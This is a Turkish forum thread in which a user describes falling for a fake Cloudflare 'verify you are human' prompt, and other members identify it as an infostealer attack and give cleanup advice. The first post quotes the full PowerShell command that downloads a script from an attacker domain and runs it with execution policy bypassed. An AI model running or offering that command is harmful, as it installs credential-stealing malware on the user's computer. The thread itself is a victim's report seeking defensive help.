ardayms

Uzman
Katılım
8 Temmuz 2025
Mesajlar
136
Çözümler
4
Beğeniler
47
Bir siteye girmek için tarayıcı çubuğuna sitenin adresini yazdım fakat 1-2 harf yanlış harf yazımından kaynaklı olduğunu düşündüğüm şekilde farklı bir siteye yönlendirmiş o esnada bunun farkına varmadım, karşıma Cloudflare doğrulaması çıktı. Ekranda yazan talimatlar şu şekildeydi: "Windows + R -> CTRL + V -> Enter". İlk defa böyle bir doğrulama görmüştüm ama hiç şüphelenmedim. Yaptım. Daha sonra birşeylerin yanlış gittiğini farkettim, bilgisayarda ufak takılmalar ve açılıp kapanan CMD ekranları.

Çalıştırdığım komut şuydu: powershell.exe -NoProfile -Command "Invoke-WebRequest -Uri 'https://animecelestialblaze.cfd/dl/gg.pro' -OutFile (Join-Path $env:TEMP 'lo.ps1'); " powershell -ExecutionPolicy Bypass -File "%TEMP%\lo.ps1"

Ekstra olarak "C:\Program Files\MSBuild\ielowutil.exe" konumunda "ielowutil.exe" adında bir uygulama vardı. Sildiğim için dosyayı burayı atamadım ama VT sonucu aşağıda:

VirusTotal

USB ile format atmayı düşündüm ama şu an mevcut olarak 8 GB bir USB'm bulunmuyor. O yüzden Windows'un kendi sıfırlama ayarından, bulut indirme ile format atacağım. Bu konuyu açmamın sebebi bu virüsün büyük çaplı bir virüs mü yoksa basit bir virüs mü olup olmadığını öğrenmek.

Not: Görev zamanlayıcısında da bu vardı (devre dışı bıraktım):

1788683674377.webp


1788683719519.webp


Not: Çoğu önemli platformlarda 2 aşamalı doğrulama ayarım açık.
 
Son düzenleyen: Moderatör:
Bunu keşke yapmasaydınız. En temizi tekrar Windows kurmak. Format at geç demek istemiyorum ancak antivirüsler ile temizlemeye çalışmak, güncel virüsler için mantıklı değil.

USB olmadan da format atılabilir. Windows ISO dosyası indirdiniz mi?
 

Ben demistim...

Ugrasmak istemiyorsan ve mumkunati varsa format oneririm. En temiz yol.
 
Bunu keşke yapmasaydınız. En temizi tekrar Windows kurmak. Format at geç demek istemiyorum ancak antivirüsler ile temizlemeye çalışmak, güncel virüsler için mantıklı değil.

USB olmadan da format atılabilir. Windows ISO dosyası indirdiniz mi?
Hayır, genelde windowsun ayarlar kısmından format başlatıyorum.


Ben demistim...

Ugrasmak istemiyorsan ve mumkunati varsa format oneririm. En temiz yol.
Her geçen gün farklı yöntemlerle karşılaşıyoruz.
 
Dedigin buluttan indirme yontemiyle yapabilirsin. Cok yuksek ihtimalle temizlenecektir. Bu arada bu olay esnasinda bilgisayarinizda aktif calisan bir antivirus bulunuyor muydu?
Hayır, ben çok fazla bilmediğim uygulamayı indiren birisi değilim önceki tecrübelerimden kaynaklı o yüzden windowsun kendi virüs sisteminide devre dışı bırakmıştım performans için.

Bu arada bu nasıl bir virüs? Discord stealer gibi çalışan bir virüs mü?
 
Malwarebytes indirip taratsan iyi olur. Yalnız ülkemizde indirilemiyor; VPN ile önce indir, sonra kur.
 
Hayır, ben çok fazla bilmediğim uygulamayı indiren birisi değilim önceki tecrübelerimden kaynaklı o yüzden windowsun kendi virüs sisteminide devre dışı bırakmıştım performans için.

Bu arada bu nasıl bir virüs? Discord stealer gibi çalışan bir virüs mü?
Antivirusun kapali olmasini bu yuzden onermiyoruz iste. Hicbir dosya indirmeden de enfekte olabiliyorsun... SSD olan, RAM darbogazi yasamayan bir sistem modern ve duzgun yapilandirilmis bir antivirus yuzunden asla performans kaybetmez...

Evet genel olarak bu yontemde kullanilan zararli InfoStealer oluyor. Credential stealer, Discord token stealer falan.

Format atmayip temizlemekle ugrasmak istiyorsan; once Gorev Zamanlayiciyi iyice kontrol et, supheli gozuken ne idugu belirsiz gorevlerin hepsini devre disi birak. SS attigin bir gorevi devre disi birakmissin zaten ama benzerleri var mi diye iyice kontrol et.

Daha sonra Autoruns yazilimini indir, "Logon, Scheduled Tasks ve Services" bolumlerinde yine supheli bir sey gorursen tikini kaldirarak devre disi birak. "Her gordugunu hemen silme, gecici olarak tikini kaldirmak yeterli, bu devre disi birakacaktir."

Ardindan sirasiyla once Emsisoft Emergency Kit indir ve tum sistem bolumlerini, bellegi ve regedit izlerini tarattir, ardindan HitmanPro taramasi; en son da Kaspersky Rescue Disk ile bootable tarama yap, taramayi baslatmadan once ayni sekilde tum disk bolumlerini sec ve ondan sonra taramayi baslat. Tespit ettiklerini once not et, ardindan temizlet.

Tarayicilarda ve uygulamalardaki aktif session'lari kapat, kritik hesaplarin sifresini degistir.
 
Antivirusun kapali olmasini bu yuzden onermiyoruz iste. Hicbir dosya indirmeden de enfekte olabiliyorsun... SSD olan, RAM darbogazi yasamayan bir sistem modern ve duzgun yapilandirilmis bir antivirus yuzunden asla performans kaybetmez...

Evet genel olarak bu yontemde kullanilan zararli InfoStealer oluyor. Credential stealer, Discord token stealer falan.

Format atmayip temizlemekle ugrasmak istiyorsan; once Gorev Zamanlayiciyi iyice kontrol et, supheli gozuken ne idugu belirsiz gorevlerin hepsini devre disi birak. SS attigin bir gorevi devre disi birakmissin zaten ama benzerleri var mi diye iyice kontrol et.

Daha sonra Autoruns yazilimini indir, "Logon, Scheduled Tasks ve Services" bolumlerinde yine supheli bir sey gorursen tikini kaldirarak devre disi birak. "Her gordugunu hemen silme, gecici olarak tikini kaldirmak yeterli, bu devre disi birakacaktir."

Ardindan sirasiyla once Emsisoft Emergency Kit indir ve tum sistem bolumlerini, bellegi ve regedit izlerini tarattir, ardindan HitmanPro taramasi; en son da Kaspersky Rescue Disk ile bootable tarama yap, taramayi baslatmadan once ayni sekilde tum disk bolumlerini sec ve ondan sonra taramayi baslat. Tespit ettiklerini once not et, ardindan temizlet.

Tarayicilarda ve uygulamalardaki aktif session'lari kapat, kritik hesaplarin sifresini degistir.
Teşekkürler, format atmadan içim pek rahat etmez gibi.

Az önce redditte bu virüs ile ilgili araştırma yaparken bir yazıyla karşılaştım: "Sayfayı birkaç kez yeniledikten sonra sorunun kaybolduğunu gördüm. Kötü amaçlı bir uzantı olmadığından emin olmak için tarayıcı uzantılarınızı da kontrol etmenizi istiyorum"

Bu yazıyı gördükten sonra kullandığım uzantılara baktım, toplam 5-6 tane var. Aralarından 1 tanesi (GoFullPage - 1 sitenin yukarıdan aşağı komple ekran görüntüsünü alıyor) uzun süredir duruyordu. Sadece eskiden birkaç kez kullanmıştım ve daha sonra kendini otomatik devre dışı bırakmış ve altında da şuna benzer bir yazı yazıyordu: "Bu eklenti ... kurallarını ihlal ettiği için devre dışı bırakıldı".

Konuyu ilk açtığımda şunu yazmıştım: "1-2 harf yanlış harf yazımından kaynaklı olduğunu düşündüğüm şekilde farklı bir siteye yönlendirmiş". Yazdığım site linkide claude ile yaptığım bir siteydi ve netlifyde deploy ettiğim için <link>.netlify.app formatında yazdım ve enter'a bastım. Daha sonra garip bir uzantısı olan site ekranı karşıma geldi, bu zaten başlı başına birşeylerin yanlış olduğunun çok büyük işaretiydi ama dalgınlığıma geldi ve ekranda yazan cloudflare işlemlerini uyguladım. Bunun 1-2 harf yanlış yazmayla kaynaklanacağını düşünmüyorum çünkü site uzantısı çok alakasızdı. Bundan yola çıkarak tarayıcıma eklediğim uzantıdan kaynaklandığını düşünüyorum.

Bu konu ile alakalı redditte gördüğüm diğer yazılar:

  • "Bu tür saldırılar Haziran 2024'te görüldü, o zamandan beri sahte PDF okuyucu gibi birçok varyasyonu var, bu sahte cloudflare doğrulamasının birden fazla varyasyonu
    Buna tıklama, düzeltme veya sahte captcha saldırısı denir. Çoğu durumda, Luma gibi Infostealer göndermek için bu tür saldırıları gözlemledim, ama bu size bir komut çalıştırdığı için her şeyi ve her şeyi verebilir

    Biri bu komutlardan birini çalıştırdıysa, ilk yapmanız gereken tüm kayıtlı şifrelerinizi değiştirmek, sonra iyi bir antivirüs çalıştırmak veya bilgisayarı biçimlendirmek
    "


 
Son düzenleme: